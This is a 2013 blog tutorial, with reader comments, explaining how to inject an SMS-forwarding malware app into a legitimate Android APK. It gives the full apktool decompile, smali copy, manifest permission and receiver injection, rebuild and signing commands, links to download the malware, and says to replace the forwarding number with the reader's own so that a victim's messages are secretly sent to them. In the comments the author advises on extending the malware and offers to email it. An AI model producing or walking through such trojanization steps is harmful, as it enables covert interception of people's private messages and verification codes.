Information Security, Web, Networks and Systems

Thursday, September 5, 2013

Android Malware Injection into Original Apps

In this post I am going to describe how malicious apps can be injected into an original apps using UBUNTU. For this post I have created a small malicious app which intercepts incoming SMS and fowards to another person without victim  knowing when message receives. You need to have following files to do this:
APKtool (for WIndows, you may need to download a windows version of apktool here)
SignAPK.jar + keys
Malicious SMSHacker.apk app

You can download all these stuff with this link;
http://www.mediafire.com/folder/64dsan4mpnxdu/appinjection

Here is a rough sketch of our process to do this..
Decompile the original android app (.apk) using apktool
Decompile the malicious android app (SMSHacker.apk) using apktool
Inject decompiled malicious app's files(Copy malicious files into) into decompiled original app
Inject permissions in the malicious apk file's AndroidManifest.xml into original file's AndroidManifest.xml
Recompile the infected original app using apktool
Sign the recompiled app using signapk.jar
Install recompiled-signed apk file into victim's device
Let's follow the listed steps;

Step 1:

    Download all files I have given in the above mediafire link. I have included all required files including sample SMSHacker app to test. And copy all files into a single directory.

Copy your apk file into which you need to inject SMSHacker into the same directory. You can keep your apk file in your own directory, but you need to mention the path to it explicitly in the following step.

Open a terminal and go to that directory. Run following command to decompile your original apk file(Android App). Lets say your original apk filename is myapp.apk;

./apktool d myapp.apk MyAppDec

In this above command 'd' switch means you are decompiling myapp.apk file. With 'MyAppDec', you mention include decompiled app in a directory named 'MyAppDec' in the same folder.

Step 2:

Now decompile your malicious file too (SMSHacker.apk);

./apktool d SMSHacker.apk SMSHackerDec

Then you'll see two directories called SMSHackerDec and MyAppDec in the same folder in which decompiled files are included.

Step 3:

If you browse into these folders, you'll note that there is a folder called smali in both the decompiled app folders. This smali folder includes all decompiled files from the apks. When you decompile an apk, they are decompiled into a file type called .smali. Now go into the folder which include all smali files of the malware (SMSHacker) with this command.

cd /SMSHackerDec/smali/com/sms/smshacker/

Then open SMSHacker.smali file in gedit.

gedit SMSHacker.smali

I created this malware and tested on emulators. So I have set the sms fowarding mobile number as '5554'. You can change it to your own one and let all receiving messages of victim be fowarded to your own number. So search for the string '5554' in the SMSHacker.smali file and replace it with your preferred number. (say your backup phone :D).

Now copy these malicious files into decompiled original app's files.

cd ../../../../../;
cp SMSHackerDec/smali/com/* -R MyAppDec/smali/com/;

Then you have injected files into the original folder. Now we need to inject required permissions from the SMSHacker's AndroidManifest.xml file into the original file's AndroidManifest.xml file.

Step 4:

Open SMSHacker's AndroidManifest.xml file in gedit.

gedit SMSHackerDec/AndroidManifest.xml

You'll see three lines in the file like these.

<uses-permission android:name="android.permission.RECEIVE_SMS" />
<uses-permission android:name="android.permission.SEND_SMS" />
<uses-permission android:name="android.permission.READ_PHONE_STATE" />

Actually we do not need the 3rd permission for this sake. So copy first two lines into the MyAppDec/AndroidManifest.xml file before <application> tag.

And also you might see few lines like followings inside the malicious file's AndroidManifest.xml

<receiver android:name="com.sms.smshacker.SMSHacker">
    <intent-filter>
        <action android:name="android.provider.Telephony.SMS_RECEIVED" />
    </intent-filter>
</receiver>

Copy this part into MyAppDec/AndroidManifest.xml within <application> tag and before  first <activity> tag.

Now save  MyAppDec/AndroidManifest.xml file and close gedit.

Now we have succesfully injected files and permissions. Now we can recompile the new app using apktool.

Step 5:

Go to the directory where apktool and other files exist and run apktool to recompile the app.

./apktool b -f MyAppDec myhackedapp.apk

This 'b' switch means build and '-f' switch means 'force'. This '-f' neglects any file changes in the apk file and compile it without any issues.

After running that command you'll see a new myhackedapp.apk file inside the same folder.

Step 6:

We need to sign that app using signapk.jar before installation. This signing task is important before installation since you cannot install an app on a device or an emulator without signing it.

Sign your apk file using following command.

java -jar signapk.jar testkey.x509.pem testkey.pk8 myhackedapp.apk myhackedapp-signed.apk

You'll see your signed apk file named myhackedapp-signed.apk.

Now we are done. We can install this apk file in any device and let victim execute the malicious code.

This SMSHacker.apk is actually an app with a Broadcast receiver. What it does is, when a message is received it gets invoked and executes the code inside its handler. I have included code to foward message to another phone inside the handler. We need to include <receiver> information inside the AndroidManifest.xml file to get this to work. That's why we injected <receiver> information from the malicious manifest file into the original manifest file. And also we require permissions to read an incoming messge and send a sms. So we injected permissions to read sms and send sms in original app's manifest. 

When installed, this would be visible as a normal app in victims device, and when victim runs the app for the first time receiver starts. After that if victim closes the original app the receiver continues listening for incoming sms.

I have included this in a module in the Android Exploitation Framework I am currently developing for a project. In that framework, one can use many types of payloads to inject to any original app.

Thanks for reading and if there are any issues, post a comment below.

13 comments:

  1. hey bro can you please tell me is it possible to create similiar malware such as this one that sends sms to a number of ur choosing just that it does exactly the opposite that it allows you to type ur own text message and make that sms sent on that phone or even make a call and have that happen on the infected phone ?

    ReplyDelete
    Replies
    1. If you have permission to send SMS, you can craft your own message and send to a number of your choice. You can do whatever is possible with the android device if you get the proper permission for it. If the victim grants you permission to use the phone to call, your malware can even make a call. Have a look at these permissions.
      (http://developer.android.com/reference/android/Manifest.permission.html).

      Delete
    2. thank you for the fast reply deepal but can you please make a tutorial for it it seems you could modify your SMShacker.apk to do that right ? because i noticed it also needs permissions to send sms since it sends to a number of your choosing so all what is needed to change the code so you can send a custom sms to a custom number and ofc an option to send that sms as many times as u want to that number, i guess that would be easier then also making a call from the infected phone since he would see the call correct ?

      Delete
    3. I'm bit out of blogging these days since busy. I'll give you couple of hints. Have a look at this post on stackoverflow: http://stackoverflow.com/questions/3593420/is-there-a-way-to-get-the-source-code-from-an-apk-file . You'll be able to go through the code and find where the content of the message and destination phone number is set. Update them as your wish and recompile it to an APK.

      Delete
  2. when trying to build the apk file , always get error

    -----------------------------------------------------
    root@bt:~# apktool b -f /root/Desktop/angrybirds/ angrybirds.apk

    Exception in thread "main" brut.androlib.AndrolibException: brut.directory.PathNotExist: apktool.yml
    at brut.androlib.Androlib.readMetaFile(Androlib.java:164)
    at brut.androlib.Androlib.build(Androlib.java:183)
    at brut.androlib.Androlib.build(Androlib.java:176)
    at brut.apktool.Main.cmdBuild(Main.java:228)
    at brut.apktool.Main.main(Main.java:79)
    Caused by: brut.directory.PathNotExist: apktool.yml
    at brut.directory.AbstractDirectory.getFileInput(AbstractDirectory.java:103)
    at brut.androlib.Androlib.readMetaFile(Androlib.java:160)
    ... 4 more

    what should i do ???? i search alot and i don't know if this error from my command or a apktool problem ?

    ReplyDelete
  3. try to copy apktool.yml to the app files folder

    and i get another error



    apktool b -f /root/Desktop/angrybirds/ angrybirds.apk
    I: Smaling...
    Exception in thread "main" brut.androlib.AndrolibException: java.io.FileNotFoundException: /root/Desktop/angrybirds/smali/com/google/android/gms/tagmanager/cb.smali (Too many open files)
    at brut.androlib.src.DexFileBuilder.addSmaliFile(DexFileBuilder.java:36)
    at brut.androlib.src.SmaliBuilder.buildFile(SmaliBuilder.java:66)
    at brut.androlib.src.SmaliBuilder.build(SmaliBuilder.java:50)
    at brut.androlib.src.SmaliBuilder.build(SmaliBuilder.java:37)
    at brut.androlib.Androlib.buildSourcesSmali(Androlib.java:257)
    at brut.androlib.Androlib.buildSources(Androlib.java:214)
    at brut.androlib.Androlib.build(Androlib.java:205)
    at brut.androlib.Androlib.build(Androlib.java:176)
    at brut.apktool.Main.cmdBuild(Main.java:228)
    at brut.apktool.Main.main(Main.java:79)
    Caused by: java.io.FileNotFoundException: /root/Desktop/angrybirds/smali/com/google/android/gms/tagmanager/cb.smali (Too many open files)
    at java.io.FileInputStream.open0(Native Method)
    at java.io.FileInputStream.open(FileInputStream.java:195)
    at java.io.FileInputStream.(FileInputStream.java:138)
    at brut.androlib.src.DexFileBuilder.addSmaliFile(DexFileBuilder.java:33)

    ReplyDelete
  4. Thanks you very much, worked fine for me. This tutorial is really good explained.

    ReplyDelete
  5. Can you please publish the SMSHacker.apk source code? I really need it (Mostly the .java files)

    ReplyDelete
    Replies
    1. Hi, Please send me an email to [email protected]. Unfortunately I don't have the source right now. I can provide you the APK file which you can decompile. Please use it for educational purposes only.

      Delete
  6. I sent you a mail.Pleas Check it.

    ReplyDelete
  7. Hi, it was a good tutorial. Everything works for me except I am not able to install newly made apk (signed one). While installing, adb shows an error as follows :
    Failure [INSTALL_FAILED_UPDATE_INCOMPATIBLE]

    ReplyDelete
    Replies
    1. Thanks for the appreciation. The error says that the apk is already installed in the device. Try uninstalling it first and reinstalling.

      Delete
  8. Hi, Excellent, it works even after reboot... very good job

    ReplyDelete

Note: Only a member of this blog may post a comment.